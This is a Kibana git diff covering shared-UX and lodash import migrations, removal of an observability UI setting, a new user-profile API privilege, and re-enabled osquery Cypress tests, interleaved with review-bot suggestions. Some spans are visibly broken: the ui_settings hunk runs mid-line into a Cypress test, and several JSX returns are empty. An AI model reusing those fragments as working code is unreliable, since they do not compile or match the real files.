a/x-pack/plugins/monitoring/server/telemetry_collection/create_query.test.ts b/x-pack/plugins/monitoring/server/telemetry_collection/create_query.test.ts index 236b9280c3b05..c24efe86e48ff 100644 --- a/x-pack/plugins/monitoring/server/telemetry_collection/create_query.test.ts +++ b/x-pack/plugins/monitoring/server/telemetry_collection/create_query.test.ts @@ -5,7 +5,7 @@ * 2.0. */ -import { set } from '@elastic/safer-lodash-set'; +import { set } from '@kbn/safer-lodash-set'; import { createTypeFilter, createQuery } from './create_query'; describe('Create Type Filter', () => { 
diff --git a/x-pack/plugins/monitoring/server/telemetry_collection/get_all_stats.ts b/x-pack/plugins/monitoring/server/telemetry_collection/get_all_stats.ts index f1c36f848ca98..f74c712fb055a 100644 --- a/x-pack/plugins/monitoring/server/telemetry_collection/get_all_stats.ts +++ b/x-pack/plugins/monitoring/server/telemetry_collection/get_all_stats.ts @@ -5,7 +5,7 @@ * 2.0. */ -import { set } from '@elastic/safer-lodash-set'; +import { set } from '@kbn/safer-lodash-set'; import { get, merge } from 'lodash'; import moment from 'moment'; diff --git a/x-pack/plugins/observability/common/index.ts b/x-pack/plugins/observability/common/index.ts index 794275c380c97..379404c3a48a1 100644 --- a/x-pack/plugins/observability/common/index.ts +++ b/x-pack/plugins/observability/common/index.ts @@ -15,7 +15,6 @@ export { enableInspectEsQueries, maxSuggestions, enableComparisonByDefault, - enableInfrastructureView, defaultApmServiceEnvironment, apmServiceInventoryOptimizedSorting, apmProgressiveLoading, diff --git a/x-pack/plugins/observability/common/ui_settings_keys.ts b/x-pack/plugins/observability/common/ui_settings_keys.ts index 60328a189b696..f3c77c76d4186 100644 --- a/x-pack/plugins/observability/common/ui_settings_keys.ts +++ b/x-pack/plugins/observability/common/ui_settings_keys.ts @@ -9,7 +9,6 @@ export const enableNewSyntheticsView = 'observability:enableNewSyntheticsView'; export const enableInspectEsQueries = 'observability:enableInspectEsQueries'; export const maxSuggestions = 'observability:maxSuggestions'; export const enableComparisonByDefault = 'observability:enableComparisonByDefault'; -export const enableInfrastructureView = 'observability:enableInfrastructureView'; export const defaultApmServiceEnvironment = 'observability:apmDefaultServiceEnvironment'; export const apmProgressiveLoading = 'observability:apmProgressiveLoading'; export const enableServiceGroups = 'observability:enableServiceGroups'; 
diff --git a/x-pack/plugins/observability/kibana.json b/x-pack/plugins/observability/kibana.json index 5464bffccd9cd..7754aedfe9ffc 100644 --- a/x-pack/plugins/observability/kibana.json +++ b/x-pack/plugins/observability/kibana.json @@ -31,7 +31,6 @@ "triggersActionsUi", "inspector", "unifiedSearch", - "sharedUX", "security" ], "ui": true, diff --git a/x-pack/plugins/observability/public/application/application.test.tsx b/x-pack/plugins/observability/public/application/application.test.tsx index 371be0ceb3a34..d630988446aa6 100644 --- a/x-pack/plugins/observability/public/application/application.test.tsx +++ b/x-pack/plugins/observability/public/application/application.test.tsx @@ -11,7 +11,7 @@ import React from 'react'; import { Observable } from 'rxjs'; import { AppMountParameters, CoreStart } from '@kbn/core/public'; import { themeServiceMock } from '@kbn/core/public/mocks'; -import { KibanaPageTemplate } from '@kbn/shared-ux-components'; +import { KibanaPageTemplate } from '@kbn/shared-ux-page-kibana-template'; import { ObservabilityPublicPluginsStart } from '../plugin'; import { createObservabilityRuleTypeRegistryMock } from '../rules/observability_rule_type_registry_mock'; import { renderApp } from '.'; diff --git a/x-pack/plugins/observability/public/components/app/section/apm/index.test.tsx b/x-pack/plugins/observability/public/components/app/section/apm/index.test.tsx index 6ba0556fa0172..00b4e464e1f45 100644 --- a/x-pack/plugins/observability/public/components/app/section/apm/index.test.tsx +++ b/x-pack/plugins/observability/public/components/app/section/apm/index.test.tsx 
@@ -17,7 +17,7 @@ import * as pluginContext from '../../../../hooks/use_plugin_context'; import { HasDataContextValue } from '../../../../context/has_data_context'; import { AppMountParameters } from '@kbn/core/public'; import { createObservabilityRuleTypeRegistryMock } from '../../../../rules/observability_rule_type_registry_mock'; -import { KibanaPageTemplate } from '@kbn/shared-ux-components'; +import { KibanaPageTemplate } from '@kbn/shared-ux-page-kibana-template'; jest.mock('react-router-dom', () => ({ useLocation: () => ({ diff --git a/x-pack/plugins/observability/public/components/shared/page_template/page_template.test.tsx b/x-pack/plugins/observability/public/components/shared/page_template/page_template.test.tsx index 176e137242ebc..89574732b5a85 100644 --- a/x-pack/plugins/observability/public/components/shared/page_template/page_template.test.tsx +++ b/x-pack/plugins/observability/public/components/shared/page_template/page_template.test.tsx @@ -10,7 +10,8 @@ import { render } from '@testing-library/react'; import { shallow } from 'enzyme'; import React from 'react'; import { of } from 'rxjs'; -import { sharedUXPluginMock } from '@kbn/shared-ux-plugin/public/mocks'; +import { getKibanaPageTemplateKibanaDependenciesMock as getPageTemplateServices } from '@kbn/shared-ux-page-kibana-template-mocks'; + import { createNavigationRegistry } from '../../../services/navigation_registry'; import { createLazyObservabilityPageTemplate } from './lazy_page_template'; import { ObservabilityPageTemplate } from './page_template'; @@ -52,7 +53,7 @@ describe('Page template', () => { getUrlForApp: () => '/test-url', navigateToApp: async () => {}, navigationSections$: navigationRegistry.sections$, - getSharedUXContext: sharedUXPluginMock.createStartContract().getContextServices, + getPageTemplateServices, }); const component = shallow( 
@@ -76,11 +77,11 @@ describe('Page template', () => { getUrlForApp={() => '/test-url'} navigateToApp={async () => {}} navigationSections$={navigationRegistry.sections$} - getSharedUXContext={sharedUXPluginMock.createStartContract().getContextServices} pageHeader={{ pageTitle: 'Test title', rightSideItems: [Test side item], }} + getPageTemplateServices={getPageTemplateServices} >
Test structure
@@ -97,11 +98,11 @@ describe('Page template', () => { getUrlForApp={() => '/test-url'} navigateToApp={async () => {}} navigationSections$={navigationRegistry.sections$} - getSharedUXContext={sharedUXPluginMock.createStartContract().getContextServices} pageHeader={{ pageTitle: 'Test title', rightSideItems: [Test side item], }} + getPageTemplateServices={getPageTemplateServices} >
Test structure
diff --git a/x-pack/plugins/observability/public/components/shared/page_template/page_template.tsx b/x-pack/plugins/observability/public/components/shared/page_template/page_template.tsx index ee05d2c4b59cb..d852a8658c2e1 100644 --- a/x-pack/plugins/observability/public/components/shared/page_template/page_template.tsx +++ b/x-pack/plugins/observability/public/components/shared/page_template/page_template.tsx @@ -12,10 +12,15 @@ import { matchPath, useLocation } from 'react-router-dom'; import useObservable from 'react-use/lib/useObservable'; import type { Observable } from 'rxjs'; import type { ApplicationStart } from '@kbn/core/public'; -import { SharedUxServicesProvider } from '@kbn/shared-ux-services'; -import type { SharedUXPluginStart } from '@kbn/shared-ux-plugin/public'; import { useKibana } from '@kbn/kibana-react-plugin/public'; -import { KibanaPageTemplate, KibanaPageTemplateProps } from '@kbn/shared-ux-components'; +import { + KibanaPageTemplate, + KibanaPageTemplateKibanaProvider, +} from '@kbn/shared-ux-page-kibana-template'; +import type { + KibanaPageTemplateProps, + KibanaPageTemplateKibanaDependencies, +} from '@kbn/shared-ux-page-kibana-template'; import type { NavigationSection } from '../../../services/navigation_registry'; import { ObservabilityTour } from '../tour'; import { NavNameWithBadge, hideBadge } from './nav_name_with_badge'; @@ -43,7 +48,7 @@ export interface ObservabilityPageTemplateDependencies { getUrlForApp: ApplicationStart['getUrlForApp']; navigateToApp: ApplicationStart['navigateToApp']; navigationSections$: Observable; - getSharedUXContext: SharedUXPluginStart['getContextServices']; + getPageTemplateServices: () => KibanaPageTemplateKibanaDependencies; } export type ObservabilityPageTemplateProps = ObservabilityPageTemplateDependencies & 
@@ -55,15 +60,14 @@ export function ObservabilityPageTemplate({ getUrlForApp, navigateToApp, navigationSections$, - getSharedUXContext, showSolutionNav = true, isPageDataLoaded = true, + getPageTemplateServices, ...pageTemplateProps }: ObservabilityPageTemplateProps): React.ReactElement | null { const sections = useObservable(navigationSections$, []); const currentAppId = useObservable(currentAppId$, undefined); const { pathname: currentPath } = useLocation(); - const sharedUXServices = getSharedUXContext(); const { services } = useKibana(); @@ -130,7 +134,7 @@ export function ObservabilityPageTemplate({ ); return ( - + - + ); } diff --git a/x-pack/plugins/observability/public/index.ts b/x-pack/plugins/observability/public/index.ts index 04cb8289dd247..b4e23ce0e83ad 100644 --- a/x-pack/plugins/observability/public/index.ts +++ b/x-pack/plugins/observability/public/index.ts @@ -27,7 +27,6 @@ export type { export { enableInspectEsQueries, enableComparisonByDefault, - enableInfrastructureView, enableServiceGroups, enableNewSyntheticsView, apmServiceGroupMaxNumberOfServices, diff --git a/x-pack/plugins/observability/public/pages/cases/cases.stories.tsx b/x-pack/plugins/observability/public/pages/cases/cases.stories.tsx index b384047a1c77b..bab4397a49a75 100644 --- a/x-pack/plugins/observability/public/pages/cases/cases.stories.tsx +++ b/x-pack/plugins/observability/public/pages/cases/cases.stories.tsx @@ -9,7 +9,7 @@ import React, { ComponentType } from 'react'; import { MemoryRouter } from 'react-router-dom'; import { AppMountParameters } from '@kbn/core/public'; import { CoreStart } from '@kbn/core/public'; -import { KibanaPageTemplate } from '@kbn/shared-ux-components'; +import { KibanaPageTemplate } from '@kbn/shared-ux-page-kibana-template'; import { createKibanaReactContext } from '@kbn/kibana-react-plugin/public'; import { casesFeatureId } from '../../../common'; import { PluginContext, PluginContextValue } from '../../context/plugin_context'; 
diff --git a/x-pack/plugins/observability/public/pages/overview/overview.stories.tsx b/x-pack/plugins/observability/public/pages/overview/overview.stories.tsx index aab1663482636..2e384e83fd03d 100644 --- a/x-pack/plugins/observability/public/pages/overview/overview.stories.tsx +++ b/x-pack/plugins/observability/public/pages/overview/overview.stories.tsx @@ -12,7 +12,7 @@ import React, { ReactNode } from 'react'; import { MemoryRouter } from 'react-router-dom'; import { UI_SETTINGS } from '@kbn/data-plugin/public'; import { createKibanaReactContext } from '@kbn/kibana-react-plugin/public'; -import { KibanaPageTemplate } from '@kbn/shared-ux-components'; +import { KibanaPageTemplate } from '@kbn/shared-ux-page-kibana-template'; import { HasDataContextProvider } from '../../context/has_data_context'; import { PluginContext } from '../../context/plugin_context'; import { registerDataHandler, unregisterDataHandler } from '../../data_handler'; diff --git a/x-pack/plugins/observability/public/pages/rules/index.test.tsx b/x-pack/plugins/observability/public/pages/rules/index.test.tsx index a9bf4aff99a83..cc8a093e32333 100644 --- a/x-pack/plugins/observability/public/pages/rules/index.test.tsx +++ b/x-pack/plugins/observability/public/pages/rules/index.test.tsx @@ -14,7 +14,7 @@ import { ObservabilityPublicPluginsStart } from '../../plugin'; import { RulesPage } from '.'; import { kibanaStartMock } from '../../utils/kibana_react.mock'; import * as pluginContext from '../../hooks/use_plugin_context'; -import { KibanaPageTemplate } from '@kbn/shared-ux-components'; +import { KibanaPageTemplate } from '@kbn/shared-ux-page-kibana-template'; import { createObservabilityRuleTypeRegistryMock } from '../../rules/observability_rule_type_registry_mock'; import { AppMountParameters } from '@kbn/core/public'; import { ALERTS_FEATURE_ID } from '@kbn/alerting-plugin/common'; 
diff --git a/x-pack/plugins/observability/public/plugin.ts b/x-pack/plugins/observability/public/plugin.ts index 617dce2959f1e..97b3746671c9d 100644 --- a/x-pack/plugins/observability/public/plugin.ts +++ b/x-pack/plugins/observability/public/plugin.ts @@ -26,7 +26,6 @@ import type { EmbeddableStart } from '@kbn/embeddable-plugin/public'; import type { HomePublicPluginSetup, HomePublicPluginStart } from '@kbn/home-plugin/public'; import { CasesDeepLinkId, CasesUiStart, getCasesDeepLinks } from '@kbn/cases-plugin/public'; import type { LensPublicStart } from '@kbn/lens-plugin/public'; -import type { SharedUXPluginStart } from '@kbn/shared-ux-plugin/public'; import { TriggersAndActionsUIPublicPluginSetup, TriggersAndActionsUIPublicPluginStart, @@ -72,7 +71,6 @@ export interface ObservabilityPublicPluginsStart { dataViews: DataViewsPublicPluginStart; lens: LensPublicStart; discover: DiscoverStart; - sharedUX: SharedUXPluginStart; ruleTypeRegistry: RuleTypeRegistryContract; actionTypeRegistry: ActionTypeRegistryContract; security: SecurityPluginStart; @@ -282,7 +280,7 @@ export class Plugin getUrlForApp: application.getUrlForApp, navigateToApp: application.navigateToApp, navigationSections$: this.navigationRegistry.sections$, - getSharedUXContext: pluginsStart.sharedUX.getContextServices, + getPageTemplateServices: () => ({ coreStart }), }); const getAsyncO11yAlertsTableConfiguration = async () => { diff --git a/x-pack/plugins/observability/public/utils/no_data_config.ts b/x-pack/plugins/observability/public/utils/no_data_config.ts index c71520e35bf18..be19e6658b5b6 100644 --- a/x-pack/plugins/observability/public/utils/no_data_config.ts +++ b/x-pack/plugins/observability/public/utils/no_data_config.ts 
@@ -7,7 +7,7 @@ import { i18n } from '@kbn/i18n'; import { IBasePath } from '@kbn/core/public'; -import { KibanaPageTemplateProps } from '@kbn/shared-ux-components'; +import type { NoDataConfig } from '@kbn/shared-ux-page-kibana-template'; export function getNoDataConfig({ docsLink, @@ -17,7 +17,7 @@ export function getNoDataConfig({ docsLink: string; basePath: IBasePath; hasData?: boolean; -}): KibanaPageTemplateProps['noDataConfig'] { +}): NoDataConfig | undefined { if (hasData === false) { return { solution: i18n.translate('xpack.observability.noDataConfig.solutionName', { diff --git a/x-pack/plugins/observability/public/utils/test_helper.tsx b/x-pack/plugins/observability/public/utils/test_helper.tsx index d262f290d1fe1..ef197f7dfc8d5 100644 --- a/x-pack/plugins/observability/public/utils/test_helper.tsx +++ b/x-pack/plugins/observability/public/utils/test_helper.tsx @@ -12,7 +12,7 @@ import { coreMock } from '@kbn/core/public/mocks'; import React from 'react'; import { __IntlProvider as IntlProvider } from '@kbn/i18n-react'; import { KibanaContextProvider } from '@kbn/kibana-react-plugin/public'; -import { KibanaPageTemplate } from '@kbn/shared-ux-components'; +import { KibanaPageTemplate } from '@kbn/shared-ux-page-kibana-template'; import translations from '@kbn/translations-plugin/translations/ja-JP.json'; import { EuiThemeProvider } from '@kbn/kibana-react-plugin/common'; import { dataPluginMock } from '@kbn/data-plugin/public/mocks'; diff --git a/x-pack/plugins/observability/server/plugin.ts b/x-pack/plugins/observability/server/plugin.ts index de4345998d4fe..c05a51741dde7 100644 --- a/x-pack/plugins/observability/server/plugin.ts +++ b/x-pack/plugins/observability/server/plugin.ts 
@@ -55,7 +55,7 @@ export class ObservabilityPlugin implements Plugin { cases: [observabilityFeatureId], privileges: { all: { - api: ['casesSuggestUserProfiles'], + api: ['casesSuggestUserProfiles', 'bulkGetUserProfiles'], app: [casesFeatureId, 'kibana'], catalogue: [observabilityFeatureId], cases: { @@ -71,6 +71,7 @@ export class ObservabilityPlugin implements Plugin { ui: casesCapabilities.all, }, read: { + api: ['bulkGetUserProfiles'], app: [casesFeatureId, 'kibana'], catalogue: [observabilityFeatureId], cases: { diff --git a/x-pack/plugins/observability/server/ui_settings.ts b/x-pack/plugins/observability/server/ui_settings.ts index 36fb6cd9f62ff..f22da4b96e6b9 100644 --- a/x-pack/plugins/observability/server/ui_settings.ts +++ b/x-pack/plugins/observability/server/ui_settings.ts @@ -13,7 +13,6 @@ import { enableComparisonByDefault, enableInspectEsQueries, maxSuggestions, - enableInfrastructureView, defaultApmServiceEnvironment, apmProgressiveLoading, enableServiceGroups, @@ -84,17 +83,6 @@ export const uiSettings: Record { cy.contains('osquery_manager-'); }); - it.skip('should have integration and packs copied when upgrading integration', () => { + it('should have integration and packs copied when upgrading integration', () => { const packageName = 'osquery_manager'; const oldVersion = '1.2.0'; - const newVersion = '1.3.1'; cy.visit(`app/integrations/detail/${packageName}-${oldVersion}/overview`); cy.contains('Add Osquery Manager').click(); 
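Review bot: The `read` privilege now carries the `bulkGetUserProfiles` API tag with no comment explaining why a read-only cases user needs to resolve user profiles; API tags widen what a role may call, so the reason should be recorded next to the grant so it stays auditable. Something like `// read-only case views also resolve user profiles (presumably for displayed assignees) — keep in sync with the cases plugin's route tags` at the `read:` entry would do, with the inference confirmed against the route that declares the tag. The privileges object starts before and ends after the visible hunks.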
@@ -100,7 +100,10 @@ describe('ALL - Add Integration', () => { navigateTo('app/osquery/packs'); findAndClickButton('Add pack'); findFormFieldByRowsLabelAndType('Name', 'Integration'); - findFormFieldByRowsLabelAndType('Scheduled agent policies (optional)', '{downArrow} {enter}'); + findFormFieldByRowsLabelAndType( + 'Scheduled agent policies (optional)', + 'Agent policy 1 {downArrow} {enter}' + ); findAndClickButton('Add query'); cy.react('EuiComboBox', { props: { placeholder: 'Search for a query to run, or write a new query below' }, @@ -109,6 +112,7 @@ describe('ALL - Add Integration', () => { .type('{downArrow} {enter}'); cy.contains(/^Save$/).click(); cy.contains(/^Save pack$/).click(); + cy.contains(/^Successfully created "Integration" pack$/).click(); cy.visit('app/fleet/policies'); cy.contains('Agent policy 1').click(); cy.contains('Upgrade').click(); @@ -119,14 +123,15 @@ describe('ALL - Add Integration', () => { cy.contains(/^Advanced$/).click(); cy.contains('"Integration":'); cy.contains('Cancel').click(); + closeModalIfVisible(); cy.get('tr') .should('contain', 'osquery_manager-2') .and('contain', 'Osquery Manager') - .and('contain', `v${newVersion}`); + .and('contain', 'v') + .and('not.contain', `v${oldVersion}`); cy.contains('Actions').click(); cy.contains('View policy').click(); cy.contains('name: osquery_manager-2'); - cy.contains(`version: ${newVersion}`); // test list of prebuilt queries navigateTo('/app/osquery/saved_queries'); diff --git a/x-pack/plugins/osquery/cypress/integration/all/alerts.spec.ts b/x-pack/plugins/osquery/cypress/integration/all/alerts.spec.ts index 80516f480e803..ee4992b04b1d2 100644 --- a/x-pack/plugins/osquery/cypress/integration/all/alerts.spec.ts +++ b/x-pack/plugins/osquery/cypress/integration/all/alerts.spec.ts 
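Review bot: `.and('contain', 'v')` in the `@@ -119` hunk is satisfied by any row text containing the letter v, so together with `.and('not.contain', `v${oldVersion}`)` it no longer proves a version was rendered after the upgrade. A pattern match keeps the test version-agnostic without losing the check, e.g. `cy.get('tr').contains(/v\d+\.\d+\.\d+/)` and, for the removed `version:` assertion on the policy view, `cy.contains(/version: \d+\.\d+\.\d+/)`. The `it` block continues outside the hunks.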
@@ -49,7 +49,7 @@ describe('Alert Event Details', () => { closeModalIfVisible(); cy.contains(PACK_NAME); cy.visit('/app/security/rules'); - cy.contains(RULE_NAME).click(); + cy.contains(RULE_NAME); cy.wait(2000); cy.getBySel('ruleSwitch').should('have.attr', 'aria-checked', 'true'); cy.getBySel('ruleSwitch').click(); @@ -58,13 +58,23 @@ describe('Alert Event Details', () => { cy.getBySel('ruleSwitch').should('have.attr', 'aria-checked', 'true'); }); - it.skip('should be able to run live query and add to timeline (-depending on the previous test)', () => { + it('should be able to run live query and add to timeline (-depending on the previous test)', () => { const TIMELINE_NAME = 'Untitled timeline'; cy.visit('/app/security/alerts'); cy.getBySel('header-page-title').contains('Alerts').should('exist'); - cy.getBySel('timeline-context-menu-button').first().click(); - cy.getBySel('osquery-action-item').should('exist').contains('Run Osquery'); - cy.getBySel('expand-event').first().click(); + cy.getBySel('expand-event') + .first() + .within(() => { + cy.get(`[data-is-loading="true"]`).should('exist'); + }); + cy.getBySel('expand-event') + .first() + .within(() => { + cy.get(`[data-is-loading="true"]`).should('not.exist'); + }); + cy.getBySel('timeline-context-menu-button').first().click({ force: true }); + cy.contains('Run Osquery'); + cy.getBySel('expand-event').first().click({ force: true }); cy.getBySel('take-action-dropdown-btn').click(); cy.getBySel('osquery-action-item').click(); cy.contains('1 agent selected.'); diff --git a/x-pack/plugins/osquery/cypress/integration/all/live_query.spec.ts b/x-pack/plugins/osquery/cypress/integration/all/live_query.spec.ts index 731802a021ae4..0678f3170f234 100644 --- a/x-pack/plugins/osquery/cypress/integration/all/live_query.spec.ts +++ b/x-pack/plugins/osquery/cypress/integration/all/live_query.spec.ts 
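Review bot: The first `within` block in the hunk at -58 asserts that `[data-is-loading="true"]` exists, which is racy — if the row finishes loading before Cypress queries it, the assertion fails although the UI is correct; the following `should('not.exist')` already expresses the wait. Dropping the `exist` block, or adding a comment such as `// the loading marker is asserted deliberately; remove if it flakes`, would make the intent explicit. The three `click({ force: true })` calls also bypass actionability checks and can hide overlapped or detached elements; a short comment on why forcing is needed here would help the next maintainer. The enclosing `it` ends outside the hunk.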
@@ -28,6 +28,7 @@ import { ROLES } from '../../test'; describe('ALL - Live Query', () => { before(() => { runKbnArchiverScript(ArchiverMethod.LOAD, 'ecs_mapping_1'); + runKbnArchiverScript(ArchiverMethod.LOAD, 'example_pack'); }); beforeEach(() => { @@ -37,6 +38,7 @@ describe('ALL - Live Query', () => { after(() => { runKbnArchiverScript(ArchiverMethod.UNLOAD, 'ecs_mapping_1'); + runKbnArchiverScript(ArchiverMethod.UNLOAD, 'example_pack'); }); it('should run query and enable ecs mapping', () => { @@ -94,22 +96,27 @@ describe('ALL - Live Query', () => { cy.react('ReactAce', { props: { value: 'select * from users' } }).should('exist'); }); - it.skip('should run live pack', () => { + it('should run live pack', () => { cy.contains('New live query').click(); cy.contains('Run a set of queries in a pack.').click(); cy.get(LIVE_QUERY_EDITOR).should('not.exist'); cy.getBySel('select-live-pack').click(); - cy.contains('Integration').click(); - cy.contains('This table contains 1 rows.'); - cy.contains('Integration ('); + cy.contains('Example').click(); + cy.contains('This table contains 3 rows.'); cy.contains('system_memory_linux_elastic'); + cy.contains('system_info_elastic'); + cy.contains('failingQuery'); selectAllAgents(); submitQuery(); cy.getBySel('live-query-loading').should('exist'); cy.getBySel('live-query-loading', { timeout: 10000 }).should('not.exist'); - cy.getBySel('toggleIcon-events').click(); + cy.getBySel('toggleIcon-system_memory_linux_elastic').click(); checkResults(); + cy.getBySel('toggleIcon-system_memory_linux_elastic').click(); + cy.getBySel('toggleIcon-failingQuery').click(); + cy.contains('Status').click(); + cy.contains('query failed, code: 1, message: no such table: opera_extensions'); navigateTo('/app/osquery'); - cy.contains('Integration'); + cy.contains('Example'); }); }); 
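Review bot: The new assertion `cy.contains('query failed, code: 1, message: no such table: opera_extensions')` in the hunk at -94 pins the exact wording of an error that presumably originates in the osquery binary rather than this plugin, so it will break on an osquery version bump. Matching only the stable part, `cy.contains('no such table: opera_extensions')`, keeps the check meaningful. The `example_pack` archive loaded in the hunks at -28 and -37 appears to be what supplies `failingQuery`; a comment there such as `// example_pack includes a deliberately failing query used below` would document that coupling.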
diff --git a/x-pack/plugins/osquery/cypress/integration/all/packs.spec.ts b/x-pack/plugins/osquery/cypress/integration/all/packs.spec.ts index 71a3cf11097c4..72fae5479a85e 100644 --- a/x-pack/plugins/osquery/cypress/integration/all/packs.spec.ts +++ b/x-pack/plugins/osquery/cypress/integration/all/packs.spec.ts @@ -59,7 +59,7 @@ describe('ALL - Packs', () => { cy.react('EuiFormRow', { props: { label: 'Interval (s)' } }) .click() .clear() - .type('10'); + .type('5'); cy.react('EuiFlyoutFooter').react('EuiButton').contains('Save').click(); cy.react('EuiTableRow').contains(SAVED_QUERY_ID); findAndClickButton('Save pack'); @@ -85,6 +85,7 @@ describe('ALL - Packs', () => { findAndClickButton('Update pack'); cy.contains('Save and deploy changes'); findAndClickButton('Save and deploy changes'); + cy.contains(`Successfully updated "${PACK_NAME}" pack`); }); it('should trigger validation when saved query is being chosen', () => { @@ -97,6 +98,7 @@ describe('ALL - Packs', () => { cy.contains('ID must be unique').should('exist'); cy.react('EuiFlyoutFooter').react('EuiButtonEmpty').contains('Cancel').click(); }); + it.skip('should open lens in new tab', () => { let lensUrl = ''; cy.window().then((win) => { 
@@ -161,6 +163,28 @@ describe('ALL - Packs', () => { cy.contains(`Successfully activated "${PACK_NAME}" pack`).should('exist'); }); + it.skip('should verify that packs are triggered', () => { + cy.waitForReact(); + preparePack(PACK_NAME); + cy.contains(`${PACK_NAME} details`).should('exist'); + + cy.getBySel('docsLoading').should('exist'); + cy.getBySel('docsLoading').should('not.exist'); + cy.react('ScheduledQueryLastResults') + .should('exist') + .within(() => { + cy.react('FormattedRelative'); + }); + + cy.react('DocsColumnResults').within(() => { + cy.react('EuiNotificationBadge').contains('1'); + }); + cy.react('AgentsColumnResults').within(() => { + cy.react('EuiNotificationBadge').contains('1'); + }); + cy.getBySel('packResultsErrorsEmpty').should('have.length', 2); + }); + it('delete all queries in the pack', () => { preparePack(PACK_NAME); cy.contains(/^Edit$/).click(); @@ -260,6 +284,7 @@ describe('ALL - Packs', () => { .click(); cy.contains(/^Delete integration$/).click(); closeModalIfVisible(); + cy.contains(/^Deleted integration 'osquery_manager-3'$/); navigateTo('app/osquery/packs'); cy.contains(REMOVING_PACK).click(); cy.contains(`${REMOVING_PACK} details`).should('exist'); diff --git a/x-pack/plugins/osquery/cypress/integration/roles/alert_test.spec.ts b/x-pack/plugins/osquery/cypress/integration/roles/alert_test.spec.ts index b68cd0d17e466..5d25b6599b13c 100644 --- a/x-pack/plugins/osquery/cypress/integration/roles/alert_test.spec.ts +++ b/x-pack/plugins/osquery/cypress/integration/roles/alert_test.spec.ts @@ -13,7 +13,7 @@ import { preparePack } from '../../tasks/packs'; import { closeModalIfVisible } from '../../tasks/integrations'; import { navigateTo } from '../../tasks/navigation'; -describe.skip('Alert_Test', () => { +describe('Alert_Test', () => { before(() => { runKbnArchiverScript(ArchiverMethod.LOAD, 'pack'); runKbnArchiverScript(ArchiverMethod.LOAD, 'rule'); 
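Review bot: The test added at -161, `it.skip('should verify that packs are triggered', ...)`, is skipped from its first commit with no stated reason, so it will silently rot; a comment such as `// TODO(<tracking-issue>): skipped until scheduled pack results are reliably available in CI` (with the real reason and issue id) should accompany the skip. Inside it, `cy.react('FormattedRelative');` asserts nothing — it needs a trailing `.should('exist')` to be a check. In the hunk at -260, `cy.contains(/^Deleted integration 'osquery_manager-3'$/)` hard-codes the `-3` suffix, which presumably depends on how many integrations earlier tests created; matching `/^Deleted integration 'osquery_manager-\d+'$/` or deriving the name from the row being deleted would decouple it from test order.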
diff --git a/x-pack/plugins/osquery/cypress/integration/roles/t1_analyst.spec.ts b/x-pack/plugins/osquery/cypress/integration/roles/t1_analyst.spec.ts
index 57995296cfb17..c151cce2c2e60 100644
--- a/x-pack/plugins/osquery/cypress/integration/roles/t1_analyst.spec.ts
+++ b/x-pack/plugins/osquery/cypress/integration/roles/t1_analyst.spec.ts
@@ -12,7 +12,7 @@ import { checkResults, selectAllAgents, submitQuery } from '../../tasks/live_que
 import { ArchiverMethod, runKbnArchiverScript } from '../../tasks/archiver';
 import { getSavedQueriesDropdown, LIVE_QUERY_EDITOR } from '../../screens/live_query';
 
-describe.skip('T1 Analyst - READ + runSavedQueries ', () => {
+describe('T1 Analyst - READ + runSavedQueries ', () => {
 const SAVED_QUERY_ID = 'Saved-Query-Id';
 
 beforeEach(() => {
diff --git a/x-pack/plugins/osquery/cypress/integration/roles/t2_analyst.spec.ts b/x-pack/plugins/osquery/cypress/integration/roles/t2_analyst.spec.ts
index cf91a49e9dad6..901b18f1461c7 100644
--- a/x-pack/plugins/osquery/cypress/integration/roles/t2_analyst.spec.ts
+++ b/x-pack/plugins/osquery/cypress/integration/roles/t2_analyst.spec.ts
@@ -19,7 +19,7 @@ import {
 import { ArchiverMethod, runKbnArchiverScript } from '../../tasks/archiver';
 import { getSavedQueriesComplexTest } from '../../tasks/saved_queries';
 
-describe.skip('T2 Analyst - READ + Write Live/Saved + runSavedQueries ', () => {
+describe('T2 Analyst - READ + Write Live/Saved + runSavedQueries ', () => {
 const SAVED_QUERY_ID = 'Saved-Query-Id';
 const NEW_SAVED_QUERY_ID = 'Saved-Query-Id-T2';
 const NEW_SAVED_QUERY_DESCRIPTION = 'Test saved query description T2';
diff --git a/x-pack/plugins/osquery/public/packs/pack_queries_status_table.tsx b/x-pack/plugins/osquery/public/packs/pack_queries_status_table.tsx
index c698db405add4..a0a1873836721 100644
--- a/x-pack/plugins/osquery/public/packs/pack_queries_status_table.tsx
+++ b/x-pack/plugins/osquery/public/packs/pack_queries_status_table.tsx
@@ -492,7 +492,7 @@ const AgentsColumnResults: React.FC = ({ actionI interval, }); if (isLoading) { - return ; + return ; } if (!lastResultsData) { @@ -531,7 +531,7 @@ const ErrorsColumnResults: React.FC = ({ } if (!errorsData?.total) { - return <>{'-'}; + return {'-'}; } return ( diff --git a/x-pack/plugins/rule_registry/common/mapping_from_field_map.ts b/x-pack/plugins/rule_registry/common/mapping_from_field_map.ts index 4833631f09adb..1b66496bee19b 100644 --- a/x-pack/plugins/rule_registry/common/mapping_from_field_map.ts +++ b/x-pack/plugins/rule_registry/common/mapping_from_field_map.ts @@ -6,7 +6,7 @@ */ import type * as estypes from '@elastic/elasticsearch/lib/api/typesWithBodyKey'; -import { set } from '@elastic/safer-lodash-set'; +import { set } from '@kbn/safer-lodash-set'; import { FieldMap } from './field_map/types'; export function mappingFromFieldMap( diff --git a/x-pack/plugins/rule_registry/server/utils/create_lifecycle_rule_type.test.ts b/x-pack/plugins/rule_registry/server/utils/create_lifecycle_rule_type.test.ts index fefffd204c4a3..e602c0228f886 100644 --- a/x-pack/plugins/rule_registry/server/utils/create_lifecycle_rule_type.test.ts +++ b/x-pack/plugins/rule_registry/server/utils/create_lifecycle_rule_type.test.ts @@ -73,6 +73,7 @@ function createRule(shouldWriteAlerts: boolean = true) { scheduleActions, } as any; }, + hasReachedAlertLimit: () => false, done: () => ({ getRecoveredAlerts: () => [] }), }; diff --git a/x-pack/plugins/security_solution/common/constants.ts b/x-pack/plugins/security_solution/common/constants.ts index 4c31f0d895464..65d1d54dcf3bc 100644 --- a/x-pack/plugins/security_solution/common/constants.ts +++ b/x-pack/plugins/security_solution/common/constants.ts 
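Review bot: `hasReachedAlertLimit: () => false` in the `createRule` test helper only exercises the path where the alert limit is not reached; if the lifecycle rule type branches on this callback, the `true` path stays untested. Giving `createRule` a second parameter mirroring `shouldWriteAlerts`, e.g. `function createRule(shouldWriteAlerts: boolean = true, hasReachedAlertLimit: boolean = false)` with `hasReachedAlertLimit: () => hasReachedAlertLimit,`, and adding one test asserting the behavior when the limit is reached, would cover it. `createRule` starts before the hunk.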
